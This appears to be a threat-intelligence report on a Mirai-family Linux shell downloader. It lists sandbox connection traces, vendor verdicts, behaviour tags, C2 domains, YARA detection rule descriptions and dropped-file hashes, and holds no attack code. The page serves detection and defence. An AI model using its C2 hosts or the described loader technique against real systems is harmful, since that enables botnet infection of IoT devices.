guuid=1d765d8d-2700-0000-8c02-080be1140000 pid=5345->guuid=1d765d8d-2700-0000-8c02-080be1140000 pid=5345|send-data send guuid=b823628d-2700-0000-8c02-080be2140000 pid=5346->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=b823628d-2700-0000-8c02-080be2140000 pid=5346|send-data send-data to 4097 IP addresses review logs to see them all guuid=b823628d-2700-0000-8c02-080be2140000 pid=5346->guuid=b823628d-2700-0000-8c02-080be2140000 pid=5346|send-data send guuid=e04ed08f-2700-0000-8c02-080be4140000 pid=5348->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=2fcb3c92-2700-0000-8c02-080be7140000 pid=5351->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=2fcb3c92-2700-0000-8c02-080be7140000 pid=5351->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2026-03-28 03:18:21 UTC
File Type:
Text (Shell)
AV detection:
23 of 36 (63.89%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=xrpe6emx5kkx2gkywwpsocpjcatedcs3gqhdadsvubrbisviovlq._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai botnet:unstable antivm botnet defense_evasion discovery linux
Link:
https://tria.ge/reports/260328-dtq9padt6m/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
Reads system network configuration
Enumerates active TCP sockets
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Contacts a large (62011) amount of remote hosts
Creates a large amount of network flows
Mirai
Mirai family
Malware Config
C2 Extraction:
cnc.504.su
scan.504.su
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/bc5e4f1197ea/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders
Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557

(this sample)

Mirai

elf c2255234f1a3d8b59014fd1b5bf43119aa164349f135d7c4a5595301e62d930e

  
URLhaus
https://urlhaus.abuse.ch/url/3669702/
  
Delivery method
Distributed via web download
  
Dropping
MD5 9ce495bf35e2be015a3a20e845e1b7dd
  
Dropping
SHA256 c2255234f1a3d8b59014fd1b5bf43119aa164349f135d7c4a5595301e62d930e
  
URLhaus
https://urlhaus.abuse.ch/url/3669710/

Comments